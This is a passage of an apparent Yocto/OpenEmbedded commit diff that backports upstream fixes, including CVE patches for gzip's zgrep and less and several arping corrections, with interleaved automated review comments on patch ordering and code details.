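+ file://0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch \
+ file://CVE-2023-36664-pre1.patch \
+ file://CVE-2023-36664-1.patch \
+ file://CVE-2023-36664-2.patch \
+ file://CVE-2023-43115.patch \
+ file://CVE-2020-36773.patch \
 "
 
 SRC_URI = "${SRC_URI_BASE} \
  file://ghostscript-9.21-prevent_recompiling.patch \
  file://cups-no-gcrypt.patch \
- file://CVE-2020-15900.patch \
  "
 
 SRC_URI_class-native = "${SRC_URI_BASE} \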
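Review bot: The order of the new `SRC_URI_BASE` entries matters, but nothing in the recipe says so. CVE-2021-45949.patch patches lines that check-stack-limits-after-function-evalution.patch introduces in `sampled_data_continue`, and CVE-2023-36664-1.patch expects the `thread_safe_memory` allocation that CVE-2023-36664-pre1.patch creates. A comment above the `SRC_URI_BASE` assignment would keep a later reorder or drop from breaking do_patch, e.g. `# Keep order: check-stack-limits-after-function-evalution before CVE-2021-45949; CVE-2023-36664-pre1, -1, -2 in sequence.` The patch files behind `CVE-2020-36773.patch` and `0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch` are not in the part of the commit shown here, so they could not be checked.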
diff --git a/meta/recipes-extended/go-examples/go-helloworld_0.1.bb b/meta/recipes-extended/go-examples/go-helloworld_0.1.bb
index ab70ea98a3..7d0f74186e 100644
--- a/meta/recipes-extended/go-examples/go-helloworld_0.1.bb
+++ b/meta/recipes-extended/go-examples/go-helloworld_0.1.bb
@@ -5,7 +5,7 @@ HOMEPAGE = "https://golang.org/"
5LICENSE = "MIT" 5LICENSE = "MIT"
6LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302" 6LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302"
7 7
8SRC_URI = "git://${GO_IMPORT}" 8SRC_URI = "git://${GO_IMPORT};branch=master"
9SRCREV = "46695d81d1fae905a270fb7db8a4d11a334562fe" 9SRCREV = "46695d81d1fae905a270fb7db8a4d11a334562fe"
10UPSTREAM_CHECK_COMMITS = "1" 10UPSTREAM_CHECK_COMMITS = "1"
11 11
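Review bot: The updated `SRC_URI` names the branch but still leaves the fetch on the default transport for `git://` URLs, unlike the iputils recipe in this same change, which adds `protocol=https`. `GO_IMPORT` is defined outside the hunk, so the host is not visible here; if it serves HTTPS, `SRC_URI = "git://${GO_IMPORT};branch=master;protocol=https"` would move the fetch to an encrypted, server-authenticated transport. `SRCREV` pins the commit, so this is about transport hardening and fetch reliability rather than a change in what gets built.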
diff --git a/meta/recipes-extended/grep/grep_3.4.bb b/meta/recipes-extended/grep/grep_3.4.bb
index e176dd727b..46ac4cfb00 100644
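--- a/meta/recipes-extended/grep/grep_3.4.bb
+++ b/meta/recipes-extended/grep/grep_3.4.bb
@@ -1,5 +1,6 @@
 SUMMARY = "GNU grep utility"
 HOMEPAGE = "http://savannah.gnu.org/projects/grep/"
+DESCRIPTION = "Grep searches one or more input files for lines containing a match to a specified pattern. By default, grep prints the matching lines."
 BUGTRACKER = "http://savannah.gnu.org/bugs/?group=grep"
 SECTION = "console/utils"
 LICENSE = "GPLv3"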
diff --git a/meta/recipes-extended/groff/groff_1.22.4.bb b/meta/recipes-extended/groff/groff_1.22.4.bb
index 7bb393e09c..f0e9eb6a8a 100644
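--- a/meta/recipes-extended/groff/groff_1.22.4.bb
+++ b/meta/recipes-extended/groff/groff_1.22.4.bb
@@ -20,7 +20,6 @@ SRC_URI[sha256sum] = "e78e7b4cb7dec310849004fa88847c44701e8d133b5d4c13057d876c1b
 
 # Remove at the next upgrade
 PR = "r1"
-HASHEQUIV_HASH_VERSION .= ".1"
 
 DEPENDS = "bison-native"
 RDEPENDS_${PN} += "perl sed"
@@ -63,6 +62,10 @@ do_install_append() {
  rm -rf ${D}${bindir}/glilypond
  rm -rf ${D}${libdir}/groff/glilypond
  rm -rf ${D}${mandir}/man1/glilypond*
+
+ # not ship /usr/bin/grap2graph and its releated man files
+ rm -rf ${D}${bindir}/grap2graph
+ rm -rf ${D}${mandir}/man1/grap2graph*
 }
 
 do_install_append_class-native() {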
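Review bot: The comment added in do_install_append, `# not ship /usr/bin/grap2graph and its releated man files`, has a typo and does not say why the tool is dropped from the image. Something like `# Do not ship grap2graph and its man pages: <reason>` would tell the next maintainer whether the removal can be lifted after an upgrade. The function begins before the hunk, so any earlier rationale is not visible here.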
diff --git a/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch b/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch
new file mode 100644
index 0000000000..046c95df47
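--- /dev/null
+++ b/meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch
@@ -0,0 +1,45 @@
+From 7073a366ee71639a1902eefb7500e14acb920f64 Mon Sep 17 00:00:00 2001
+From: Lasse Collin <lasse.collin@tukaani.org>
+Date: Mon, 4 Apr 2022 23:52:49 -0700
+Subject: [PATCH] zgrep: avoid exploit via multi-newline file names
+
+* zgrep.in: The issue with the old code is that with multiple
+newlines, the N-command will read the second line of input,
+then the s-commands will be skipped because it's not the end
+of the file yet, then a new sed cycle starts and the pattern
+space is printed and emptied. So only the last line or two get
+escaped. This patch makes sed read all lines into the pattern
+space and then do the escaping.
+
+This vulnerability was discovered by:
+cleemy desu wayo working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/gzip.git/commit/?id=dc9740df61e575e8c3148b7bd3c147a81ea00c7c]
+CVE: CVE-2022-1271
+
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+---
+ zgrep.in | 10 +++++++---
+ 1 file changed, 7 insertions(+), 3 deletions(-)
+
+diff --git a/zgrep.in b/zgrep.in
+index 3efdb52..d391291 100644
+--- a/zgrep.in
++++ b/zgrep.in
+@@ -222,9 +222,13 @@ do
+ '* | *'&'* | *'\'* | *'|'*)
+ i=$(printf '%s\n' "$i" |
+ sed '
+- $!N
+- $s/[&\|]/\\&/g
+- $s/\n/\\n/g
++ :start
++ $!{
++ N
++ b start
++ }
++ s/[&\|]/\\&/g
++ s/\n/\\n/g
+ ');;
+ esac
+ sed_script="s|^|$i:|"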
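Review bot: The backport touches only `zgrep.in` (the diffstat lists one file), so nothing shipped with the recipe exercises the multi-newline file name case the fix is about. The gzip recipe already carries `file://run-ptest`, so adding a regression case for a file name containing several newlines would keep the escaping from silently regressing when the patch is refreshed. The rewritten script also depends on how the installed sed handles the `:start` label and the `$!{ ... }` group; upstream, as far as I recall, later reworked this escaping for sed portability, so it is worth running zgrep against the sed the target image actually ships. The enclosing `case` and loop start outside the hunk.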
diff --git a/meta/recipes-extended/gzip/gzip_1.10.bb b/meta/recipes-extended/gzip/gzip_1.10.bb
index 9778e687e1..c558c21f10 100644
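--- a/meta/recipes-extended/gzip/gzip_1.10.bb
+++ b/meta/recipes-extended/gzip/gzip_1.10.bb
@@ -4,6 +4,7 @@ LICENSE = "GPLv3+"
 
 SRC_URI = "${GNU_MIRROR}/gzip/${BP}.tar.gz \
  file://run-ptest \
+ file://CVE-2022-1271.patch \
  "
 SRC_URI_append_class-target = " file://wrong-path-fix.patch"
 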
diff --git a/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch b/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch
new file mode 100644
index 0000000000..bf86115843
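--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch
@@ -0,0 +1,79 @@
+From 86ed08936d49e2c81ef49dfbd02aca1c74d0c098 Mon Sep 17 00:00:00 2001
+From: lac-0073 <61903197+lac-0073@users.noreply.github.com>
+Date: Mon, 26 Oct 2020 09:45:42 +0800
+Subject: [PATCH] arpping: make update neighbours work again
+
+The arping is using inconsistent sender_ip_addr and target_ip_addr in
+messages. This causes the client receiving the arp message not to update
+the arp table entries.
+
+The specific performance is as follows:
+
+There is a machine 2 with IP 10.20.30.3 configured on eth0:0 that is in the
+same IP subnet as eth0. This IP was originally used on another machine 1,
+and th IP needs to be changed back to the machine 1. When using the arping
+command to announce what ethernet address has IP 10.20.30.3, the arp table
+on machine 3 is not updated.
+
+Machine 3 original arp table:
+
+ 10.20.30.3 machine 2 eth0:0 00:00:00:00:00:02
+ 10.20.30.2 machine 2 eth0 00:00:00:00:00:02
+ 10.20.30.1 machine 1 eth0 00:00:00:00:00:01
+
+Create interface eth0:0 on machine 1, and use the arping command to send arp
+packets. Expected outcome on machine 3:
+
+ 10.20.30.3 machine 1 eth0:0 00:00:00:00:00:01
+ 10.20.30.2 machine 2 eth0 00:00:00:00:00:02
+ 10.20.30.1 machine 1 eth0 00:00:00:00:00:01
+
+Actual results on machine 3:
+
+ 10.20.30.3 machine 2 eth0:0 00:00:00:00:00:02
+ 10.20.30.2 machine 2 eth0 00:00:00:00:00:02
+ 10.20.30.1 machine 1 eth0 00:00:00:00:00:01
+
+Fixes: https://github.com/iputils/iputils/issues/298
+Fixes: 68f12fc4a0dbef4ae4c404da24040d22c5a14339
+Signed-off-by: Aichun Li <liaichun@huawei.com>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/86ed08936d49e2c81ef49dfbd02aca1c74d0c098]
+Signed-off-by: Visa Hankala <visa@hankala.org>
+---
+ arping.c | 16 +++++++++-------
+ 1 file changed, 9 insertions(+), 7 deletions(-)
+
+diff --git a/arping.c b/arping.c
+index a002786..53fdbb4 100644
+--- a/arping.c
++++ b/arping.c
+@@ -968,7 +968,7 @@ int main(int argc, char **argv)
+ }
+ memset(&saddr, 0, sizeof(saddr));
+ saddr.sin_family = AF_INET;
+- if (!ctl.unsolicited && (ctl.source || ctl.gsrc.s_addr)) {
++ if (ctl.source || ctl.gsrc.s_addr) {
+ saddr.sin_addr = ctl.gsrc;
+ if (bind(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
+ error(2, errno, "bind");
+@@ -979,12 +979,14 @@ int main(int argc, char **argv)
+ saddr.sin_port = htons(1025);
+ saddr.sin_addr = ctl.gdst;
+
+- if (setsockopt(probe_fd, SOL_SOCKET, SO_DONTROUTE, (char *)&on, sizeof(on)) == -1)
+- error(0, errno, _("WARNING: setsockopt(SO_DONTROUTE)"));
+- if (connect(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
+- error(2, errno, "connect");
+- if (getsockname(probe_fd, (struct sockaddr *)&saddr, &alen) == -1)
+- error(2, errno, "getsockname");
++ if (!ctl.unsolicited) {
++ if (setsockopt(probe_fd, SOL_SOCKET, SO_DONTROUTE, (char *)&on, sizeof(on)) == -1)
++ error(0, errno, _("WARNING: setsockopt(SO_DONTROUTE)"));
++ if (connect(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
++ error(2, errno, "connect");
++ if (getsockname(probe_fd, (struct sockaddr *)&saddr, &alen) == -1)
++ error(2, errno, "getsockname");
++ }
+ ctl.gsrc = saddr.sin_addr;
+ }
+ close(probe_fd);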
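Review bot: With connect() and getsockname() now skipped in unsolicited mode, the unchanged `ctl.gsrc = saddr.sin_addr;` that follows copies the value set just above by `saddr.sin_addr = ctl.gdst;`, so the source address silently becomes the destination address. That appears to be the intent, since the description wants sender and target IP to agree, but nothing in the code says so. A comment above the new `if (!ctl.unsolicited) {`, such as `/* unsolicited: keep saddr = gdst so sender and target IP match */`, would make that explicit. The enclosing block in main() begins outside the hunk, so which modes reach this code cannot be confirmed from here.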
diff --git a/meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch b/meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch
new file mode 100644
index 0000000000..8495178879
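--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch
@@ -0,0 +1,39 @@
+From 18f14be80466ddc8fb17a400be82764a779c8dcd Mon Sep 17 00:00:00 2001
+From: Sami Kerola <kerolasa@iki.fi>
+Date: Wed, 31 Jul 2019 21:28:12 +0100
+Subject: [PATCH] arping: revert partially - fix sent vs received packages
+ return value
+
+Commit 84ca65ca980315c73f929fed8b6f16bbd698c3a0 caused regression. The
+arping -D needs return value evaluation that was the earlier default, in
+other cases the new return value should be correct.
+
+Addresses: https://github.com/iputils/iputils/issues/209
+See-also: https://github.com/void-linux/void-packages/issues/13304
+Signed-off-by: Sami Kerola <kerolasa@iki.fi>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/18f14be80466ddc8fb17a400be82764a779c8dcd]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/arping.c b/arping.c
+index 77c9c56..2c87c15 100644
+--- a/arping.c
++++ b/arping.c
+@@ -792,7 +792,11 @@ static int event_loop(struct run_state *ctl)
+ close(tfd);
+ freeifaddrs(ctl->ifa0);
+ rc |= finish(ctl);
+- rc |= (ctl->sent != ctl->received);
++ if (ctl->dad && ctl->quit_on_reply)
++ /* Duplicate address detection mode return value */
++ rc |= !(ctl->brd_sent != ctl->received);
++ else
++ rc |= (ctl->sent != ctl->received);
+ return rc;
+ }
+
+--
+2.18.4
+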
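Review bot: The added comment `/* Duplicate address detection mode return value */` does not say which outcome maps to which exit status, and the double negation in `rc |= !(ctl->brd_sent != ctl->received);` is easy to misread. A comment such as `/* DAD: non-zero when every broadcast probe was answered, i.e. the address is in use */` would spell it out. That reading is inferred from the expression alone and should be checked against finish(), whose result is OR-ed into `rc` just above. event_loop begins outside the hunk.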
diff --git a/meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch b/meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch
new file mode 100644
index 0000000000..a5f40860dc
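--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch
@@ -0,0 +1,39 @@
+From 1df5350bdc952b14901fde356b17b78c2bcd4cff Mon Sep 17 00:00:00 2001
+From: Sami Kerola <kerolasa@iki.fi>
+Date: Wed, 28 Aug 2019 20:05:22 +0100
+Subject: [PATCH] arping: fix -f quit on first reply regression
+
+When arping runs together with -f 'quit on first reply' and -w <timeout>
+'how long to wait for a reply' the command needs to exit if replies are not
+received after wait period. Notice that the exit in case of lost packages
+will be 1 signifying failure. Getting a reply results to 0 exit value.
+
+Addresses: https://bugs.debian.org/935946
+Reported-by: Lucas Nussbaum <lucas@debian.org>
+Addresses: https://github.com/iputils/iputils/issues/211
+Reported-by: Noah Meyerhans <noahm@debian.org>
+Broken-since: 67e070d08dcbec990e1178360f82b3e2ca4f6d5f
+Signed-off-by: Sami Kerola <kerolasa@iki.fi>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/1df5350bdc952b14901fde356b17b78c2bcd4cff]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/arping.c b/arping.c
+index 2c87c15..30884f6 100644
+--- a/arping.c
++++ b/arping.c
+@@ -764,7 +764,8 @@ static int event_loop(struct run_state *ctl)
+ continue;
+ }
+ total_expires += exp;
+- if (0 < ctl->count && (uint64_t)ctl->count < total_expires) {
++ if ((0 < ctl->count && (uint64_t)ctl->count < total_expires) ||
++ (ctl->quit_on_reply && ctl->timeout < total_expires)) {
+ exit_loop = 1;
+ continue;
+ }
+--
+2.18.4
+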
diff --git a/meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch b/meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch
new file mode 100644
index 0000000000..ebd122c157
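--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch
@@ -0,0 +1,37 @@
+From ec821e572a640bd79aecc3922cb9001f4b6b26f2 Mon Sep 17 00:00:00 2001
+From: Petr Vorel <petr.vorel@gmail.com>
+Date: Sat, 7 Sep 2019 06:07:19 +0200
+Subject: [PATCH] arping: Fix comparison of different signedness warning
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+../arping.c:768:45: warning: comparison of integer expressions of different signedness: ‘int’ and ‘uint64_t’ {aka ‘long unsigned int’} [-Wsign-compare]
+ 768 | (ctl->quit_on_reply && ctl->timeout < total_expires)) {
+
+Fixes: 1df5350 ("arping: fix -f quit on first reply regression")
+Reference: https://github.com/iputils/iputils/pull/212
+Acked-by: Sami Kerola <kerolasa@iki.fi>
+Signed-off-by: Petr Vorel <petr.vorel@gmail.com>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/ec821e572a640bd79aecc3922cb9001f4b6b26f2]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/arping.c b/arping.c
+index 2d05728..88319cd 100644
+--- a/arping.c
++++ b/arping.c
+@@ -765,7 +765,7 @@ static int event_loop(struct run_state *ctl)
+ }
+ total_expires += exp;
+ if ((0 < ctl->count && (uint64_t)ctl->count < total_expires) ||
+- (ctl->quit_on_reply && ctl->timeout < total_expires)) {
++ (ctl->quit_on_reply && ctl->timeout < (long)total_expires)) {
+ exit_loop = 1;
+ continue;
+ }
+--
+2.18.4
+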
diff --git a/meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch b/meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch
new file mode 100644
index 0000000000..923e06e30b
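--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch
@@ -0,0 +1,45 @@
+From 68f12fc4a0dbef4ae4c404da24040d22c5a14339 Mon Sep 17 00:00:00 2001
+From: Sami Kerola <kerolasa@iki.fi>
+Date: Sat, 8 Feb 2020 14:12:18 +0000
+Subject: [PATCH] arping: return success when unsolicited ARP mode destination
+ does not answer
+
+Manual page is making promise answers are not expected when -U (or -A)
+option is in use. Either I am looking wrong or this has been broken since
+at the beginning of git history.
+
+Addresses: https://github.com/iputils/iputils/issues/247
+Signed-off-by: Sami Kerola <kerolasa@iki.fi>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/68f12fc4a0dbef4ae4c404da24040d22c5a14339]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 6 ++++--
+ 1 file changed, 4 insertions(+), 2 deletions(-)
+
+diff --git a/arping.c b/arping.c
+index 996cf2b..5180ae0 100644
+--- a/arping.c
++++ b/arping.c
+@@ -794,7 +794,9 @@ static int event_loop(struct run_state *ctl)
+ close(tfd);
+ freeifaddrs(ctl->ifa0);
+ rc |= finish(ctl);
+- if (ctl->dad && ctl->quit_on_reply)
++ if (ctl->unsolicited)
++ /* nothing */;
++ else if (ctl->dad && ctl->quit_on_reply)
+ /* Duplicate address detection mode return value */
+ rc |= !(ctl->brd_sent != ctl->received);
+ else
+@@ -943,7 +945,7 @@ int main(int argc, char **argv)
+ }
+ memset(&saddr, 0, sizeof(saddr));
+ saddr.sin_family = AF_INET;
+- if (ctl.source || ctl.gsrc.s_addr) {
++ if (!ctl.unsolicited && (ctl.source || ctl.gsrc.s_addr)) {
+ saddr.sin_addr = ctl.gsrc;
+ if (bind(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1)
+ error(2, errno, "bind");
+--
+2.18.4
+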
diff --git a/meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch b/meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch
new file mode 100644
index 0000000000..3b8a8244da
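--- /dev/null
+++ b/meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch
@@ -0,0 +1,94 @@
+From 60a27c76174c0ae23bdafde2bad4fdd18a44a7ea Mon Sep 17 00:00:00 2001
+From: Sami Kerola <kerolasa@iki.fi>
+Date: Sat, 7 Mar 2020 22:03:21 +0000
+Subject: [PATCH] arping: use additional timerfd to control when timeout
+ happens
+
+Trying to determine timeout by adding up interval values is pointlessly
+complicating. With separate timer everything just works.
+
+Addresses: https://github.com/iputils/iputils/issues/259
+Fixes: 1df5350bdc952b14901fde356b17b78c2bcd4cff
+Signed-off-by: Sami Kerola <kerolasa@iki.fi>
+Upstream-Status: Backport [https://github.com/iputils/iputils/commit/e594ca52afde89746b7d79c875fe9d6aea1850ac]
+Signed-off-by: Diego Santa Cruz <Diego.SantaCruz@spinetix.com>
+---
+ arping.c | 29 ++++++++++++++++++++++++++---
+ 1 file changed, 26 insertions(+), 3 deletions(-)
+
+diff --git a/arping.c b/arping.c
+index 61db3a6..7284351 100644
+--- a/arping.c
++++ b/arping.c
+@@ -670,6 +670,7 @@ static int event_loop(struct run_state *ctl)
+ enum {
+ POLLFD_SIGNAL = 0,
+ POLLFD_TIMER,
++ POLLFD_TIMEOUT,
+ POLLFD_SOCKET,
+ POLLFD_COUNT
+ };
+@@ -686,6 +687,13 @@ static int event_loop(struct run_state *ctl)
+ .it_value.tv_sec = ctl->interval,
+ .it_value.tv_nsec = 0
+ };
++ int timeoutfd;
++ struct itimerspec timeoutfd_vals = {
++ .it_interval.tv_sec = ctl->timeout,
++ .it_interval.tv_nsec = 0,
++ .it_value.tv_sec = ctl->timeout,
++ .it_value.tv_nsec = 0
++ };
+ uint64_t exp, total_expires = 1;
+
+ unsigned char packet[4096];
+@@ -709,7 +717,7 @@ static int event_loop(struct run_state *ctl)
+ pfds[POLLFD_SIGNAL].fd = sfd;
+ pfds[POLLFD_SIGNAL].events = POLLIN | POLLERR | POLLHUP;
+
+- /* timerfd */
++ /* interval timerfd */
+ tfd = timerfd_create(CLOCK_MONOTONIC, 0);
+ if (tfd == -1) {
+ error(0, errno, "timerfd_create failed");
+@@ -722,6 +730,19 @@ static int event_loop(struct run_state *ctl)
+ pfds[POLLFD_TIMER].fd = tfd;
+ pfds[POLLFD_TIMER].events = POLLIN | POLLERR | POLLHUP;
+
++ /* timeout timerfd */
++ timeoutfd = timerfd_create(CLOCK_MONOTONIC, 0);
++ if (tfd == -1) {
++ error(0, errno, "timerfd_create failed");
++ return 1;
++ }
++ if (timerfd_settime(timeoutfd, 0, &timeoutfd_vals, NULL)) {
++ error(0, errno, "timerfd_settime failed");
++ return 1;
++ }
++ pfds[POLLFD_TIMEOUT].fd = timeoutfd;
++ pfds[POLLFD_TIMEOUT].events = POLLIN | POLLERR | POLLHUP;
++
+ /* socket */
+ pfds[POLLFD_SOCKET].fd = ctl->socketfd;
+ pfds[POLLFD_SOCKET].events = POLLIN | POLLERR | POLLHUP;
+@@ -764,13 +785,15 @@ static int event_loop(struct run_state *ctl)
+ continue;
+ }
+ total_expires += exp;
+- if ((0 < ctl->count && (uint64_t)ctl->count < total_expires) ||
+- (ctl->quit_on_reply && ctl->timeout < (long)total_expires)) {
++ if (0 < ctl->count && (uint64_t)ctl->count < total_expires) {
+ exit_loop = 1;
+ continue;
+ }
+ send_pack(ctl);
+ break;
++ case POLLFD_TIMEOUT:
++ exit_loop = 1;
++ break;
+ case POLLFD_SOCKET:
+ if ((s =
+ recvfrom(ctl->socketfd, packet, sizeof(packet), 0,
+--
+2.18.4
+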
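Review bot: The check after `timeoutfd = timerfd_create(CLOCK_MONOTONIC, 0);` tests `tfd` rather than the descriptor just created, so a failed creation of the timeout timer is not detected there; it should read `if (timeoutfd == -1) {`. As written the failure would only surface at the following timerfd_settime() call, with a "timerfd_settime failed" message that points at the wrong step. The two new `return 1;` paths also leave the earlier descriptors open, and no close of `timeoutfd` appears in the visible hunks, though event_loop's cleanup lies outside them. Separately, the Upstream-Status URL names commit e594ca52afde89746b7d79c875fe9d6aea1850ac while the From line carries 60a27c76174c0ae23bdafde2bad4fdd18a44a7ea, unlike the other arping backports here where the two match, so it is worth confirming which upstream commit this tracks.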
diff --git a/meta/recipes-extended/iputils/iputils_s20190709.bb b/meta/recipes-extended/iputils/iputils_s20190709.bb
index 545f3d5e87..a715d0a37b 100644
--- a/meta/recipes-extended/iputils/iputils_s20190709.bb
+++ b/meta/recipes-extended/iputils/iputils_s20190709.bb
@@ -10,11 +10,17 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=55aa8c9fcad0691cef0ecd420361e390"
10 10
11DEPENDS = "gnutls" 11DEPENDS = "gnutls"
12 12
13SRC_URI = "git://github.com/iputils/iputils \ 13SRC_URI = "git://github.com/iputils/iputils;branch=master;protocol=https \
14 file://0001-ninfod-change-variable-name-to-avoid-colliding-with-.patch \ 14 file://0001-ninfod-change-variable-name-to-avoid-colliding-with-.patch \
15 file://0001-ninfod-fix-systemd-Documentation-url-error.patch \ 15 file://0001-ninfod-fix-systemd-Documentation-url-error.patch \
16 file://0001-rarpd-rdisc-Drop-PrivateUsers.patch \ 16 file://0001-rarpd-rdisc-Drop-PrivateUsers.patch \
17 file://0001-iputils-Initialize-libgcrypt.patch \ 17 file://0001-iputils-Initialize-libgcrypt.patch \
18 file://0001-arping-revert-partially-fix-sent-vs-received-package.patch \
19 file://0002-arping-fix-f-quit-on-first-reply-regression.patch \
20 file://0003-arping-Fix-comparison-of-different-signedness-warnin.patch \
21 file://0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch \
22 file://0005-arping-use-additional-timerfd-to-control-when-timeou.patch \
23 file://0001-arping-make-update-neighbours-work-again.patch \
18 " 24 "
19SRCREV = "13e00847176aa23683d68fce1d17ffb523510946" 25SRCREV = "13e00847176aa23683d68fce1d17ffb523510946"
20 26
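Review bot: Two entries in the new list share the `0001-arping-` prefix, and the one applied last, `0001-arping-make-update-neighbours-work-again.patch`, undoes part of what the `0004-arping-...` patch changes (the `!ctl.unsolicited &&` bind condition). The list order is therefore load-bearing while the numbering suggests otherwise. A comment above the `SRC_URI` assignment, e.g. `# arping backports are listed in upstream commit order; do not reorder`, or renumbering the last patch, would guard against an accidental reorder during a later refresh.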
diff --git a/meta/recipes-extended/less/less/CVE-2022-48624.patch b/meta/recipes-extended/less/less/CVE-2022-48624.patch
new file mode 100644
index 0000000000..409730bd4f
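--- /dev/null
+++ b/meta/recipes-extended/less/less/CVE-2022-48624.patch
@@ -0,0 +1,41 @@
+From c6ac6de49698be84d264a0c4c0c40bb870b10144 Mon Sep 17 00:00:00 2001
+From: Mark Nudelman <markn@greenwoodsoftware.com>
+Date: Sat, 25 Jun 2022 11:54:43 -0700
+Subject: [PATCH] Shell-quote filenames when invoking LESSCLOSE.
+
+Upstream-Status: Backport [https://github.com/gwsw/less/commit/c6ac6de49698be84d264a0c4c0c40bb870b10144]
+CVE: CVE-2022-48624
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ filename.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/filename.c b/filename.c
+index 5824e385..dff20c08 100644
+--- a/filename.c
++++ b/filename.c
+@@ -972,6 +972,8 @@ close_altfile(altfilename, filename)
+ {
+ #if HAVE_POPEN
+ char *lessclose;
++ char *qfilename;
++ char *qaltfilename;
+ FILE *fd;
+ char *cmd;
+ int len;
+@@ -986,9 +988,13 @@ close_altfile(altfilename, filename)
+ error("LESSCLOSE ignored; must contain no more than 2 %%s", NULL_PARG);
+ return;
+ }
+- len = (int) (strlen(lessclose) + strlen(filename) + strlen(altfilename) + 2);
++ qfilename = shell_quote(filename);
++ qaltfilename = shell_quote(altfilename);
++ len = (int) (strlen(lessclose) + strlen(qfilename) + strlen(qaltfilename) + 2);
+ cmd = (char *) ecalloc(len, sizeof(char));
+- SNPRINTF2(cmd, len, lessclose, filename, altfilename);
++ SNPRINTF2(cmd, len, lessclose, qfilename, qaltfilename);
++ free(qaltfilename);
++ free(qfilename);
+ fd = shellcmd(cmd);
+ free(cmd);
+ if (fd != NULL)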
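Review bot: `qfilename` and `qaltfilename` go straight into strlen() and SNPRINTF2 with no NULL check. If shell_quote() can return NULL for a name it cannot quote (I believe it does when no escape character is configured and the name itself contains quotes, but that needs confirming against filename.c), the LESSCLOSE path would dereference a null pointer. A guard before the length computation, such as `if (qfilename == NULL || qaltfilename == NULL) { free(qfilename); free(qaltfilename); return; }`, would skip LESSCLOSE for such names instead. close_altfile starts and ends outside these hunks.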
diff --git a/meta/recipes-extended/less/less_551.bb b/meta/recipes-extended/less/less_551.bb
index a818c68fc7..401f40bed5 100644
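--- a/meta/recipes-extended/less/less_551.bb
+++ b/meta/recipes-extended/less/less_551.bb
@@ -26,6 +26,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \
 DEPENDS = "ncurses"
 
 SRC_URI = "http://www.greenwoodsoftware.com/${BPN}/${BPN}-${PV}.tar.gz \
+ file://CVE-2022-48624.patch \
  "
 
 SRC_URI[md5sum] = "4ad4408b06d7a6626a055cb453f36819"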
diff --git a/meta/recipes-extended/libaio/libaio_0.3.111.bb b/meta/recipes-extended/libaio/libaio_0.3.111.bb
index 8e1cd349a0..309ae53bfb 100644
--- a/meta/recipes-extended/libaio/libaio_0.3.111.bb
+++ b/meta/recipes-extended/libaio/libaio_0.3.111.bb
@@ -5,7 +5,7 @@ HOMEPAGE = "http://lse.sourceforge.net/io/aio.html"
5LICENSE = "LGPLv2.1+" 5LICENSE = "LGPLv2.1+"
